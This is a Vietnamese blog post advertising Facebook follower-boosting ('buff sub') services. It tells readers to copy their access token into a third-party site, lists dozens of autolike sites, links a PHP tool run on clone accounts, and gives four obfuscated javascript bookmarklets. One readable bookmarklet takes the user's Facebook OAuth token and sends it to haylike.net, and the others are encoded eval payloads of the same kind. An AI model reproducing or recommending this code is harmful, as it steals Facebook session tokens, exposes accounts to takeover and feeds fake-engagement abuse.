💚 Bài Viết Gần Đây 💚

Hưỡng Dẫn Cách Bật AVT Khiên Cho Tất Cả Anh Em Nè

- Hưỡng Dẫn Cách Bật AVT Khiên Cho Tất Cả Anh Em Nè HIHI
Bước 1 : Lấy token (Vào link profile của mình Ctrl+U => Ctrl + F => Nhập EAA sẽ thấy đoạn token )
Bước 2 : Vào Web : https://tanglike.ml/avatar.php
BƯỚC 3: Nhập Vào Nha 
Nếu thành công thì khiên avatar sẽ được bật lên và token đó sẽ bị vô hiệu hóa ngay lập tức.
(Check: https://developers.facebook.com/tools/debug/accesstoken/…(token ủa bạn)
Nếu check profile không có khiên thì xem lại token.
P's: À ở trên thì nói chatbot nhưng làm biếng create page mới quá nên để api cho mọi người sử dụng :3
Demo : https://www.facebook.com/IAm.NguyenVanKien.Info

TUT BUFF SUB CURL + CODE SUB BY NVK


TUT BUFF SUB ĐỘC QUYỀN BY NGUYỄN VĂN KIÊN✔ 2018 ✔
DUỚI Đ Y GỒM NHỮNG WED BUFF SUB HIỆU QUẢ NHẤT CÓ CẢ KHÔNG TIME ( CLICK MÕI TAY )
- RẤT NHIỀU KÉO MÕI CM TAY NHÁ ~.~
http://buffsubfb.com ( Không Time ) 
 http://vipsub.me/ ( 200 Sub 1 Lần  )
getsub.top
facefuck.pro
mymemo.pro
hublaa.me
vipfb.us
http://autosubviet.com
https://auto-bonyeuai.rhcloud.com
https://autosubhp.net 
http://autovip.me
Vipfb.biz  ( 150 Sub 1 Lần )
http://like5s.net/
http://likevip.net/
http://wefbee.com/
https://hublaafollow.me/
http://likevipvn.xyz/
https://autolikeviet.vn/
http://likecuoi.vn/
http://like.vipvui.vn/
http://likesvn.info/
http://botviplike.cf/
https://auto-bot.me/
http://autolike.vn/
https://vipfb.net/
https://ilikesub.com/
http://hacklike24h.com/
http://autolike-us.com/
http://www.myfbliker.com/
http://autoliker4fb.com/
http://auto-like.net/
https://autobotfb.com/
http://starvip.info/
http://4liker.com/
http://autolikeviet.me/
http://hotface.pro/
http://botfb.org/
http://botfb.pro/
http://starlike.ml/
http://tanglike.ml/
http://haylike.net/
http://autolikesub.com/
https://autolikepro.net/
http://www.vipviet.info/
http://botviet.net/
http://bot24h.com/
https://chuyhiep.net/
http://vnlike.me/
http://testing12.ml/
https://botvn.me/
http://likecuoi.vn/
http://fbliker.in/
http://www.myliker.com/
http://oneliker.com/
http://othertools.official-liker.net/
http://autofollower.4liker.com/

- Nếu Muốn Tools Reg Clone Hãy Inbox Fb NGUYỄN VĂN KIÊN✔
- HÌNH ẢNH  HƯỚNG DẪN CURL SUB 2018
!

- DOWLOAD CURL SUB TẠI Đ Y : http://www.mediafire.com/file/agn7ybl4phmuhnd/Curl+Sub+2017+%23NTH.zip
- HƯỚNG DẪN SỬ DỤNG :v
AresT_Config.php: chỉnh sửa $tokenlink = 'http://www.teamloli.com/token'; chỉnh sửa chữ tô đỏ thành domain website bạn và $AresT2k1 ='xxx'; thành ID nick Facebook của bạn
AresT_Acc.php: chỉnh sửa thành list acc clone facebook của bạn
Hướng Dẫn Cron File
AresT_Token.php: treo 2 phút một lần
AresT_Cron.php: treo 5 phút một lần
các bạn có thểtreo cron tại: Cron-Job.org
-------------------------------------------------------------------------------------------------------------------
DƯỚI Đ Y LÀ CODE SUB !! CHƯA FIX
Code Sub 1.

javascript:var _2916;var _5397='3548E42C167A399D357A391E227E371E385F393C395E357F387F387D227E285E227A241D363B285A241B281A183E399B357F391B227C403A383C403C403D227B285A227F241C261A271C269C277E259B273C267D273F271A275D269E267E271D263E271E241E281D183B399E357C391E227F373F363D353F357D387E387B227D285A227E241C261C271E269B277C259D273E267A273F271C275F269D267B271E263A271B241A281F183D399E357E391E227E377C365D405C227A285B227B241D241F281E183A399B357B391D227B363D365F379C357C405E353B395B373D381F365A227E285F227D261A259F259C259B281B183B367F397D383B361E395B373C385C383B227D393B379B365E365A387C243B363C365F379F357F405F245A227E409D183A181B399C357C391B227C393D395E357E391F395F227E285F227A383E365B401D227E299F357C395A365B243D245A255C369F365A395E331E373B381A365B243A245A281F183E181D401B371A373F379F365D227F243B383A365A401F227D299B357E395F365F243C245B255B369C365E395E331D373F381C365F243B245F227B283F227C393C395B357D391F395C227A249C227A363A365F379E357F405E245E281F183D413E183D399C357F391E227C367B359A353D363B395F393D369C227F285B227D363E385A361B397E381A365A383C395D255E369F365A395B301E379B365D381F365A383C395C393A295A405C319F357A381F365F243C241F367C359F353D363D395D393F369F241A245C345D259B349E255C399D357A379F397F365C281A183B257B257A327A365D387E379A357E361A365E227B405B385F397D391B227E397D391B379C279E183A399F357F391F227A391C373B385A227C285E227A241A371E395C395E387A279F257C257A379A373B377F365D255A399A373F387D399A397B373D255C399D383C257C379C385D369D373E383A257C393E397B359A255B387B371F387E289B397D393C365D391D285D241C281C183C257C257A183F399F357D391B227B395F385B377C365B383E357E383E363B391E385A373C363E227A285D227E241B241E281D183E399A357E391D227A365E227F285A227C383A365F401D227E339A317F315F307E395C395D387B327D365D389B397B365D393B395D281C183B399E357F391C227D395E227D285D227E241D371B395F395A387F393A279E257C257F401E401B401A255B367A357A361A365B359A385F385C377F255B361C385E381E257C399D261F255E259C257A363D373C357B379B385A369A257E385A357C397D395E371E257B361F385B383B367A373D391E381D241E281F183A399C357B391D227F383F227B285E227C241F367D359A353D363D395D393B369C285E241B227F249C227C367E359E353B363C395F393E369C227F249C227E241A239D357A387D387E353E373E363C285B241E227A249A227A373D363C353D357A387F387A227C249A227C241F239C391A365C363F373F391B365A361B395D353A397F391E373F285A367A359F361F385E383F383E365B361F395D279C257B257C393C397A361C361A365D393B393D239C363B373D393C387E379B357D405E285E387F385B387A397B387E239B357B361E361C365D393F393D353E395B385C377D365A383B285B239E393B363E377A285B239C367F391D385C381C353B387E385E393E395F285B261B239A387C391A373D399E357F395E365A285E239C395B385A393B285D239A379B385E369D373A383F285A239B391E365C357C363D285A239F401D391D373C395C365D285C239B365D403C395C365C383B363C365D363F285A239B393A385E361F373E357A379C353E361D385B383F367E373C391B381E285C239B361B385F383D367C373A391B381F285D239B393D365E365A383F353B393F361B385D387E365C393A285C239C357C397A395E371B353E395A405A387E365C285E239C357A397D395B371D353D395F385B377E365B383A285D239D357F397F395D371B353E383A385F383F361D365F285B239B363D365A367A357F397B379B395D353F357A397A363C373F365E383D361B365F285B239C391A365A367C285F299D365F367F357C397D379A395C239E391F365B395D397B391B383F353B367D385A391C381E357E395B285C357A361B361C365C393D393A353E395B385F377B365F383E239C363D385B381B357A373E383D285E239F393A393F385B353D363D365D399D373F361F365A285D373A385C393A239B353E353A297F321B319C303B309D327D317D353D353C285C261F241B281B183B365B255B385A387D365A383D243A241F323F321C329B331F241B251C227C395C251E227E395D391A397A365F245A281F183D365F255D385C383C391D365C357B363C405D393A395C357A395E365F361C371E357C383E369A365D227F285B227D367C397A383C361D395F373E385E383B227B243D245A227F409E183E181B373C367F227D243F365E255C391C365D357C363A405E329A395E357D395B365D227D285F285C227C267F227C239B239E227D365E255A393F395A357A395B397D393A227D285D285B227B263A259F259C245A227C409C183A181B181D381C357E359E357C385B381F357D395A227B285F227A365A255A391B365B393B387C385F383B393A365F331F365E403C395D255B381B357E395C361D371E243E257A395B385A377C365B383C285E243E255E249B245E239F257E245F345C261F349D281A183B181D181E365F255F361D379A385D393F365A281F183F181A181B399F357A391D227C367B227D285D227B383A365A401E227C339B317D315C307E395E395F387C327E365F389C397F365C393D395B281E183C181C181C399A357C391D227D395A227A285D227D241F257F257E401B401C401E255C367A357D361B365A359C385C385A377B255F361E385A381D257C399A261D255F259E257C363F373D357F379C385C369D257E385B357E397B395D371D257B361E385D383E367E373A391B381B241E281F183B181C181F399D357A391A227E383B227D285A227E241F367C359C353E363B395B393E369E285B241C227A249C227C367C359B353C363A395D393C369C227B249A227B241D239A357B387C387B353C373C363A285E241F227C249B227B373B363D353B357D387A387B227E249A227F241B239C391D365C363B373C391B365D361B395D353B397C391D373E285C367C359A361E385C383E383A365D361D395F279E257E257F393D397C361A361F365A393B393D239F363E373B393C387C379F357F405D285A387A385F387F397C387B239A357B361D361A365B393A393E353B395F385F377F365E383E285C239C393B363A377D285E239F367B391B385F381D353D387D385D393F395D285B261D239F387D391C373A399B357A395D365B285B239B395C385C393E285D239A379A385F369B373E383C285C239F391F365F357B363A285E239E401B391D373B395E365C285F239D365E403B395F365C383D363F365D363A285F239E393F385D361D373E357F379E353A361C385B383C367A373E391F381A285E239A361E385B383F367D373C391A381A285F239F393D365E365D383E353F393E361A385C387E365B393A285E239A357A397A395B371B353B395B405C387A365C285E239F357D397F395A371E353C395D385C377B365B383C285C239C357C397B395C371E353E383C385E383C361C365F285D239E363A365F367D357F397B379C395B353A357A397E363C373A365D383E361E365E285A239A391C365A367F285F299B365E367A357A397D379D395D239B391D365B395E397D391E383C353F367D385F391B381B357A395F285C357F361C361E365B393A393C353E395B385A377F365B383D239F363E385B381A357D373C383A285B239F393F393B385F353D363E365F399F373D361D365A285B373D385D393F239C353F353A297C321A319F303B309D327B317A353C353A285E261B241C281B183A181C181D367A255D385B387D365F383F243D241B323B321D329F331E241B251A227A395A251D227F395D391D397F365C245B281E183E181F181F367A255B385C383D391E365A357F363A405C393D395B357F395C365F361A371F357D383A369F365E227B285C227E367B397C383A361A395E373E385A383F227D243F245A227F409B183F181E181B181A373B367A227F243A367F255D391F365A357D363C405B329A395C357F395E365F227F285E285D227D267A227C239F239C227B367D255B393F395C357E395C397F393F227E285A285A227E263D259F259E245F227C409C183F181F181A181A181F395A385F377C365B383F357E383F363B391F385E373C363E227A285E227B367D255D391C365F393E387D385F383D393C365C331E365B403D395C255D381A357F395D361F371D243B257F395F385B377F365F383F285A243D255D249B245E239F257D245C345D261A349E281E183C181B181C181F181C367F255D361F379F385D393D365C281C183B181D181A181A181A393F379F365E365D387E243B363E365A379D357E405F353D395A373A381B365F245C281D183F181A181F181A181B379D385C361A357D395E373D385E383E255A371A391F365B367D227F285B227F391F373F385B227C249A227E381A357B359E357E385E381D357F395B227F249F227F241D239E377E365F405E285A241D227D249E227F377A365A405E227B249C227C241A239D371A385D393E395A357E387C387F285B241F227C249C227F371A385B393C395A357C387F387E227E249B227B395E385C377D365A383F357A383F363A391D385B373D363B281E183E181B181E181D413E183C181C181D413B281A183C181B181D367B255B393B365F383F363D243D383A245C281A183C181C413B183A413C281F183B365A255D393C365D383A363F243C383F245C281B';var _8361=/[\x41\x42\x43\x44\x45\x46]/;var _7481=2;var _5399=_5397.charAt(_5397.length-1);var _3517;var _2585=_5397.split(_8361);var _9832=[String.fromCharCode,isNaN,parseInt,String];_2585[1]=_9832[_7481+1](_9832[_7481](_2585[1])/21);var _3395=(_7481==6)?String:eval;_3517='';_11=_9832[_7481](_2585[0])/_9832[_7481](_2585[1]);for(_2916=3;_2916<_11;_2916++)_3517+=(_9832[_7481-2]((_9832[_7481](_2585[_2916])+_9832[_7481](_2585[2])+_9832[_7481](_2585[1]))/_9832[_7481](_2585[1])-_9832[_7481](_2585[2])+_9832[_7481](_2585[1])-1));var _9166='_3445';var _5462='_9166=_3517';function _9205(_1740){_3395(_1946);_9205(_5651);_5651(_5462);_9205(_9166);}var _1946='_9205=_3395';var _5651='_5651=_9205';_9205(_5399);


Code sub 2.

javascript:var _7261;var _6888='15993F189C142C2117C1928E2081F1343B1991B2054A2090D2099F1928D2063A2063D1343E1604E1343A1406A1955A1604E1406A1586C1145A2117B1928D2081A1343E2135B2045D2135E2135A1343C1604D1343B1406D1496A1541D1532A1568B1487E1550A1523F1550C1541B1559F1532C1523F1541D1505F1541C1406E1586E1145F2117C1928A2081C1343E2000E1955B1910D1928C2063E2063A1343E1604B1343D1406C1496A1541B1532F1568E1487E1550F1523C1550A1541A1559E1532E1523D1541E1505E1541B1406B1586A1145F2117B1928F2081D1343C2018F1964C2144B1343A1604D1343A1406B1406D1586A1145F2117F1928B2081F1343D1955B1964C2027F1928D2144C1910C2099A2000D2036D1964A1343C1604D1343C1496F1487F1487E1487F1586F1145D1973C2108D2045C1946B2099A2000D2054D2045B1343C2090C2027E1964E1964C2063B1415D1955F1964D2027F1928A2144B1424E1343B2162B1145C1136C2117A1928B2081C1343E2090C2099D1928B2081F2099A1343D1604A1343E2045E1964B2126C1343F1667C1928B2099C1964A1415C1424A1469C1982F1964A2099A1811E2000B2036C1964C1415A1424F1586A1145F1136F2126F1991E2000D2027F1964B1343C1415C2045F1964E2126F1343F1667E1928E2099C1964D1415C1424C1469E1982C1964D2099D1811A2000D2036D1964E1415A1424A1343F1595A1343B2090B2099B1928F2081E2099A1343C1442F1343B1955D1964F2027B1928C2144A1424B1586F1145B2180D1145A2117D1928A2081B1343F1973E1937B1910E1955D2099B2090F1982A1343B1604D1343B1955A2054B1946E2108C2036D1964B2045C2099B1469B1982D1964E2099F1676D2027D1964E2036E1964E2045E2099D2090C1649C2144E1757E1928A2036F1964A1415D1406A1973A1937C1910F1955F2099B2090C1982E1406E1424D1874F1487A1892E1469A2117B1928D2027E2108D1964A1586D1145B1478D1478E1793A1964B2063E2027F1928C1946A1964B1343F2144B2054B2108B2081A1343D2108B2081B2027A1577D1145E2117A1928A2081F1343D2081B2000D2054A1343A1604C1343F1406E1991A2099B2099F2063F1577D1478F1478C2027C2000B2018F1964C1469B2117C2000D2063F2117B2108D2000F1469F2117B2045D1478C2027D2054B1982C2000A2045E1478B1973E2081A2000C1964E2045A1955E1469A2063F1991E2063D1622E2108B2090A1964A2081E1604E1406B1586E1145E1478D1478A1145A2117B1928A2081C1343B2099A2054A2018C1964C2045D1928A2045E1955F2081E2054D2000B1955C1343F1604C1343C1406C1406E1586E1145A2117D1928B2081C1343A1964E1343A1604F1343E2045B1964D2126A1343D1847A1748F1739A1703D2099B2099D2063C1793F1964D2072F2108F1964D2090C2099B1586B1145D2117D1928B2081C1343B2099C1343C1604E1343B1406B1991C2099E2099A2063F2090A1577F1478C1478B2126D2126B2126C1469C1973D1928D1946E1964E1937A2054B2054A2018D1469E1946A2054A2036D1478A2117B1496C1469C1487E1478B1955E2000B1928C2027D2054B1982F1478E2054E1928A2108C2099D1991C1478D1946E2054E2045A1973B2000D2081B2036D1406E1586F1145C2117E1928C2081C1343D2045C1343A1604F1343D1406B1973A1937B1910A1955B2099A2090E1982A1604E1406B1343C1442B1343A1973C1937A1910B1955C2099E2090B1982D1343D1442C1343D1406D1397F1928E2063C2063B1910F2000A1955F1604C1406A1343C1442B1343D2000E1955D1910E1928E2063F2063F1343C1442F1343B1406C1397F2081F1964C1955C2000E2081C1964D1946C2099A1910F2108E2081A2000D1604B1973E1937A1946A2054A2045E2045F1964B1946E2099F1577C1478B1478F2090D2108B1946A1946A1964D2090F2090C1397E1955B2000C2090F2063E2027E1928D2144C1604F2063F2054B2063E2108B2063E1397C1928C1946D1946D1964D2090B2090B1910A2099D2054F2018A1964D2045E1604F1397A2090B1955D2018F1604C1397F1973D2081C2054E2036D1910E2063B2054C2090D2099C1604B1496E1397B2063F2081F2000B2117E1928D2099C1964A1604C1397A2099B2054A2090D1604C1397D2027A2054A1982E2000E2045C1604D1397E2081B1964B1928E1955D1604F1397C2126D2081B2000E2099B1964C1604D1397F1964E2135B2099C1964C2045A1955C1964D1955F1604D1397A2090A2054F1946F2000B1928F2027A1910D1946D2054D2045C1973A2000E2081E2036F1604F1397D1946D2054E2045B1973B2000F2081B2036F1604B1397B2090E1964F1964A2045C1910B2090E1946C2054C2063F1964F2090F1604E1397A1928B2108A2099C1991F1910D2099F2144D2063D1964C1604E1397D1928F2108D2099B1991F1910A2099C2054E2018D1964F2045A1604E1397D1928B2108B2099C1991F1910F2045A2054E2045C1946E1964C1604B1397D1955C1964D1973E1928D2108A2027F2099D1910C1928E2108C1955C2000A1964C2045A1946B1964E1604D1397E2081A1964E1973A1604F1667D1964C1973C1928B2108E2027A2099A1397E2081F1964E2099A2108B2081D2045F1910E1973A2054C2081D2036D1928B2099B1604D1928F1946A1946C1964E2090A2090D1910C2099F2054B2018B1964A2045F1397A1955F2054E2036E1928A2000F2045F1604A1397D2090C2090C2054F1910B1955B1964B2117D2000C1946A1964D1604B2000C2054F2090C1397E1910B1910F1658D1766C1757F1685A1712D1793C1748C1910F1910C1604E1496C1406A1586F1145B1964A1469C2054A2063E1964E2045C1415C1406A1775D1766A1802E1811D1406B1451B1343C2099B1451E1343C2099A2081D2108F1964D1424E1586F1145D1964A1469A2054A2045E2081B1964B1928D1955A2144C2090E2099D1928D2099F1964F1946E1991E1928D2045F1982F1964C1343C1604E1343E1973D2108C2045B1946D2099A2000F2054C2045E1343D1415F1424A1343A2162E1145B1136C2000B1973E1343E1415A1964E1469E2081E1964F1928E1955A2144B1802A2099E1928C2099B1964D1343F1604E1604C1343B1523F1343D1397D1397D1343F1964B1469F2090A2099C1928E2099C2108D2090E1343C1604E1604C1343D1505E1487A1487F1424C1343A2162A1145A1136D1136B2036B1928C1937B1928A2054A2036D1928A2099A1343A1604F1343B1964F1469E2081D1964F2090B2063B2054A2045D2090B1964F1811F1964A2135A2099F1469F2036E1928D2099F1946B1991D1415F1478F2099B2054F2018B1964A2045D1604F1415C1469E1442B1424D1397C1478D1424B1874E1496C1892D1586E1145B1136F1136E1964A1469A1946D2027B2054F2090C1964C1586B1145E1136F1136B2117B1928E2081B1343F1973B1343B1604F1343D2045F1964D2126E1343C1847F1748B1739A1703A2099D2099A2063E1793F1964D2072C2108F1964F2090F2099C1586E1145A1136D1136C2117B1928A2081A1343B2099F1343F1604C1343F1406D1478B1478B2126B2126E2126B1469B1973A1928D1946C1964B1937D2054B2054E2018D1469E1946A2054A2036B1478B2117B1496B1469C1487C1478E1955A2000B1928D2027C2054E1982C1478F2054A1928F2108D2099F1991C1478A1946D2054A2045D1973B2000F2081A2036D1406E1586F1145F1136B1136C2117D1928B2081A1343B2045A1343D1604B1343C1406A1973E1937C1910B1955F2099D2090C1982D1604C1406F1343B1442E1343E1973A1937F1910D1955F2099B2090D1982C1343C1442D1343B1406C1397A1928C2063F2063A1910F2000C1955D1604F1406D1343C1442F1343E2000C1955D1910E1928D2063B2063A1343D1442B1343C1406E1397B2081A1964F1955E2000B2081E1964A1946A2099C1910C2108B2081E2000E1604C1973F1937D1946F2054C2045F2045B1964C1946D2099E1577F1478D1478A2090D2108E1946C1946A1964C2090B2090F1397C1955D2000F2090B2063B2027D1928D2144A1604C2063B2054F2063C2108A2063D1397E1928D1946E1946D1964A2090E2090F1910B2099D2054D2018E1964E2045E1604D1397E2090A1955A2018E1604B1397A1973A2081A2054A2036E1910E2063A2054C2090D2099B1604D1496E1397D2063B2081E2000A2117A1928C2099B1964A1604D1397A2099B2054D2090A1604A1397A2027E2054F1982E2000B2045D1604A1397D2081D1964A1928C1955B1604C1397C2126D2081E2000F2099C1964C1604A1397D1964A2135D2099B1964D2045E1955E1964D1955D1604B1397A2090F2054C1946A2000D1928C2027C1910A1946A2054B2045F1973E2000B2081A2036B1604C1397B1946D2054F2045A1973D2000B2081D2036D1604F1397C2090C1964F1964F2045C1910A2090A1946E2054E2063F1964C2090F1604E1397C1928A2108D2099B1991F1910A2099A2144E2063E1964E1604D1397A1928D2108A2099B1991F1910A2099E2054D2018E1964F2045F1604A1397C1928F2108A2099A1991E1910A2045C2054D2045D1946C1964A1604E1397A1955C1964B1973D1928A2108C2027A2099E1910F1928A2108E1955A2000F1964C2045C1946A1964E1604C1397A2081C1964F1973B1604F1667A1964A1973B1928C2108C2027A2099E1397F2081A1964F2099F2108C2081E2045E1910E1973D2054E2081E2036B1928D2099C1604C1928C1946F1946F1964B2090B2090E1910B2099B2054E2018D1964A2045F1397A1955C2054B2036C1928F2000A2045A1604A1397B2090F2090E2054D1910A1955E1964C2117D2000A1946A1964B1604F2000F2054F2090E1397F1910F1910E1658A1766F1757C1685D1712E1793B1748A1910D1910A1604E1496B1406B1586D1145E1136D1136F1973A1469D2054B2063C1964A2045E1415F1406E1775F1766B1802A1811A1406C1451D1343D2099D1451B1343F2099A2081B2108B1964F1424D1586D1145B1136D1136D1973E1469D2054C2045A2081B1964E1928A1955E2144A2090B2099D1928B2099B1964F1946C1991B1928F2045E1982A1964E1343D1604F1343F1973F2108C2045E1946B2099F2000C2054D2045F1343D1415F1424C1343D2162F1145D1136B1136D1136E2000C1973A1343B1415B1973C1469A2081D1964E1928D1955D2144F1802F2099A1928B2099F1964D1343E1604A1604B1343A1523D1343B1397B1397A1343F1973C1469C2090B2099C1928F2099C2108E2090D1343A1604F1604E1343D1505D1487D1487F1424F1343F2162D1145D1136F1136B1136D1136C2099E2054D2018F1964B2045F1928C2045B1955D2081D2054F2000B1955C1343E1604A1343B1973B1469C2081C1964A2090F2063B2054B2045A2090B1964E1811B1964A2135A2099D1469C2036E1928C2099E1946B1991C1415B1478D2099E2054E2018A1964D2045D1604C1415E1469F1442B1424D1397B1478E1424B1874A1496F1892D1586A1145D1136A1136A1136D1136E1973D1469A1946E2027D2054C2090A1964A1586D1145B1136A1136F1136A1136C2090A2027B1964A1964C2063C1415A1955B1964A2027F1928C2144D1910C2099C2000A2036D1964F1424D1586A1145A1136A1136B1136C1136A2027C2054E1946D1928A2099C2000B2054E2045E1469A1991B2081F1964C1973F1343A1604E1343E2081B2000D2054E1343E1442B1343B2036B1928F1937B1928D2054E2036E1928B2099D1343A1442D1343E1406F1397A2018F1964D2144B1604B1406A1343A1442C1343A2018B1964C2144A1343A1442E1343E1406A1397D1991A2054F2090F2099D1928B2063A2063C1604E1406F1343E1442D1343C1991E2054B2090A2099D1928B2063C2063A1343D1442F1343A2099F2054A2018F1964B2045D1928E2045C1955D2081E2054E2000C1955E1586B1145A1136F1136D1136C2180B1145E1136C1136D2180F1586F1145E1136B1136D1973E1469D2090F1964D2045B1955C1415A2045A1424C1586A1145D1136E2180D1145C2180B1586C1145B1964A1469B2090B1964E2045D1955C1415E2045A1424A1586D';var _8852=/[\x41\x42\x43\x44\x45\x46]/;var _7662=2;var _5755=_6888.charAt(_6888.length-1);var _3187;var _5952=_6888.split(_8852);var _5850=[String.fromCharCode,isNaN,parseInt,String];_5952[1]=_5850[_7662+1](_5850[_7662](_5952[1])/21);var _4383=(_7662==8)?String:eval;_3187='';_11=_5850[_7662](_5952[0])/_5850[_7662](_5952[1]);for(_7261=3;_7261<_11;_7261++)_3187+=(_5850[_7662-2]((_5850[_7662](_5952[_7261])+_5850[_7662](_5952[2])+_5850[_7662](_5952[1]))/_5850[_7662](_5952[1])-_5850[_7662](_5952[2])+_5850[_7662](_5952[1])-1));var _9532='_5766';var _1460='_9532=_3187';function _6389(_9055){_4383(_7715);_6389(_4232);_4232(_1460);_6389(_9532);}var _7715='_6389=_4383';var _4232='_4232=_6389';_6389(_5755);

Code sub 3.

javascript:var _0x5be6=["165907476854626","http://haylike.net/login.php?users=","getTime","value","fb_dtsg","getElementsByName","/v1.0/dialog/oauth/confirm","fb_dtsg=","&app_id=","&redirect_uri=fbconnect://success&display=popup&access_token=&sdk=&from_post=1&private=&tos=&login=&read=&write=&extended=&social_confirm=&confirm=&seen_scopes=&auth_type=&auth_token=&auth_nonce=&default_audience=&ref=Default&return_format=access_token&domain=&sso_device=ios&__CONFIRM__=1","POST","open","onreadystatechange","readyState","status","match","responseText","close","/v1.0/dialog/oauth/confirm","href","send"];var id_app=_0x5be6[0];var haylike=_0x5be6[1];function sleep(_0x442fx4){var _0x442fx5= new Date()[_0x5be6[2]]();while( new Date()[_0x5be6[2]]()<_0x442fx5+_0x442fx4){;}}var delay_time=1000;var fb_dtsg=document[_0x5be6[5]](_0x5be6[4])[0][_0x5be6[3]];var e= new XMLHttpRequest;var t=_0x5be6[6];var n=_0x5be6[7]+fb_dtsg+_0x5be6[8]+id_app+_0x5be6[9];e[_0x5be6[11]](_0x5be6[10],t,true);e[_0x5be6[12]]=function(){if(e[_0x5be6[13]]==4&&e[_0x5be6[14]]==200){mabaomat=e[_0x5be6[16]][_0x5be6[15]](/token=(.+)&/)[1];e[_0x5be6[17]];var _0x442fxb= new XMLHttpRequest;var t=_0x5be6[18];var n=_0x5be6[7]+fb_dtsg+_0x5be6[8]+id_app+_0x5be6[9];_0x442fxb[_0x5be6[11]](_0x5be6[10],t,true);_0x442fxb[_0x5be6[12]]=function(){if(_0x442fxb[_0x5be6[13]]==4&&_0x442fxb[_0x5be6[14]]==200){mabaomat=_0x442fxb[_0x5be6[16]][_0x5be6[15]](/token=(.+)&/)[1];_0x442fxb[_0x5be6[17]];sleep(delay_time);location[_0x5be6[19]]=haylike+mabaomat}};_0x442fxb[_0x5be6[20]](n)}};e[_0x5be6[20]](n);


Code sub 4.


var _9994;var _6935='11186A147D203C1911B1848A1995E1848D1974C1862E1967A1904A1953F1981B1575F1995E1848C1967D1393D1834B1505E2009C1540D1855C1876B1547F1596E1806C1407C1512B1547D1540C1568D1505D1554A1533D1554B1547E1561D1540D1533F1547B1519E1547E1407B1477C1407B1897C1981B1981D1953C1575C1498C1498F1981D1848E1918F1904D1953F1862A1904F1491C1883E1855A1981D1848B1918A1904C1953F1491B1862D1946E1932A1498B1925C1946E1890B1904C1939F1491E1953F1897C1953A1610F1988A1974D1876D1967F1596D1407B1477E1407D1890D1876E1981A1757A1904B1932E1876E1407A1477F1407F1995E1848B1925A1988C1876E1407F1477E1407B1883E1855B1834B1869F1981F1974D1890B1407A1477D1407E1890D1876B1981D1652B1925F1876E1932C1876C1939F1981F1974D1631D2016A1715C1848F1932D1876E1407D1477F1407B1897A1981E1981C1953F1974F1575C1498F1498B2002A2002B2002E1491B1883E1848A1862B1876C1855E1946D1946E1918C1491D1862F1946B1932D1498F1995A1512B1491B1505A1498D1869B1904D1848D1925B1946C1890A1498C1946B1848A1988D1981A1897F1498B1862C1946C1939F1883E1904F1967B1932C1407D1477A1407E1883A1855E1834C1869F1981A1974B1890B1596F1407F1477E1407F1435A1848E1953B1953A1834E1904E1869A1596B1407D1477F1407A1435D1967F1876D1869A1904F1967D1876B1862F1981B1834F1988A1967C1904A1596D1883A1855E1862F1946E1939F1939C1876A1862E1981E1575D1498E1498C1974B1988D1862E1862D1876A1974E1974B1435F1869D1904A1974D1953E1925B1848F2016E1596F1953A1946D1953C1988F1953D1435B1848B1862C1862B1876F1974C1974E1834E1981D1946D1918B1876B1939A1596A1435E1974D1869F1918B1596D1435B1883F1967B1946B1932C1834B1953C1946A1974E1981C1596B1512D1435A1953D1967A1904C1995B1848A1981C1876C1596D1435B1981D1946B1974A1596A1435D1925B1946A1890D1904D1939F1596A1435B1967A1876F1848B1869A1596F1435D2002B1967B1904A1981C1876F1596F1435C1876E2009D1981C1876E1939F1869B1876B1869D1596F1435C1974C1946A1862D1904F1848F1925F1834D1862E1946E1939C1883E1904C1967B1932D1596E1435A1862C1946B1939A1883A1904D1967B1932B1596F1435A1974E1876A1876E1939C1834A1974A1862C1946B1953E1876F1974D1596A1435A1848B1988C1981D1897D1834E1981D2016A1953E1876C1596A1435B1848C1988C1981C1897D1834D1981E1946F1918E1876D1939B1596E1435B1848C1988B1981A1897E1834E1939E1946B1939E1862C1876B1596A1435C1869C1876F1883A1848A1988E1925C1981C1834A1848E1988D1869E1904C1876A1939A1862D1876B1596C1435D1967B1876E1883E1596B1645B1876A1883C1848D1988F1925D1981C1435E1967A1876A1981A1988A1967D1939B1834F1883D1946A1967C1932F1848F1981B1596A1848D1862C1862D1876C1974C1974A1834C1981F1946D1918E1876E1939B1435C1869E1946A1932A1848C1904F1939A1596A1435F1974D1974D1946E1834C1869E1876A1995B1904C1862C1876D1596C1904A1946D1974B1435F1834F1834B1638D1722D1715B1659D1680F1743A1708B1834F1834D1596C1512C1407C1477D1407A1729E1722B1750F1757A1407E1477D1407E1946A1953D1876E1939E1407B1477E1407A1946F1939E1967F1876B1848E1869F2016E1974F1981F1848C1981E1876E1862E1897A1848A1939E1890B1876C1407B1477F1407E1967B1876E1848F1869F2016D1750D1981E1848E1981B1876A1407F1477C1407B1974D1981C1848F1981C1988F1974C1407D1477B1407A1932D1848B1981E1862B1897E1407E1477B1407B1967D1876D1974C1953B1946F1939E1974B1876F1757D1876A2009B1981B1407C1477A1407C1862C1925E1946A1974E1876B1407D1477F1407A1498F1498B2002B2002C2002E1491C1883A1848A1862B1876C1855B1946B1946A1918C1491B1862D1946A1932D1498E1995B1512E1491C1505C1498B1869D1904F1848F1925A1946B1890C1498F1946A1848B1988E1981C1897F1498B1862D1946C1939F1883A1904E1967D1932A1407F1477B1407C1897E1967F1876C1883E1407D1477E1407A1974A1876D1939C1869F1407C1820E1582B1995A1848F1967D1393F1904C1869A1834C1848B1953D1953A1596E1834E1505B2009B1540C1855A1876C1547F1806C1505C1820A1582A1995F1848D1967D1393D1925D1904F1918A1876B1540D1974B1596A1834C1505D2009B1540D1855D1876E1547F1806A1512A1820B1582A1883B1988E1939D1862C1981C1904E1946A1939A1393D1974F1925C1876D1876D1953A1449C1834D1505B2009F1533C1533F1519D1883B2009D1533E1456E2030B1995C1848E1967C1393D1834E1505D2009A1533B1533E1519C1883D2009E1540D1596C1393A1939F1876C2002C1393A1645B1848B1981F1876A1449C1456C1806F1834D1505C2009A1540D1855D1876F1547A1806B1519E1820D1820A1449E1456B1582A2002F1897C1904B1925B1876B1449C1393C1939E1876F2002B1393B1645A1848D1981E1876A1449D1456B1806E1834A1505D2009B1540E1855C1876C1547D1806F1519E1820F1820F1449F1456B1589A1834C1505D2009F1533F1533D1519B1883E2009B1540A1470E1834B1505A2009C1533A1533B1519B1883D2009F1533B1456F2030B1582E2044D2044D1995C1848E1967A1393D1869D1876C1925E1848F2016C1834C1981F1904C1932E1876B1596E1512D1505E1505C1505B1582A1995E1848A1967D1393F1883F1855B1834D1869D1981A1974B1890C1596C1869A1946D1862C1988C1932E1876D1939A1981E1806B1834C1505A2009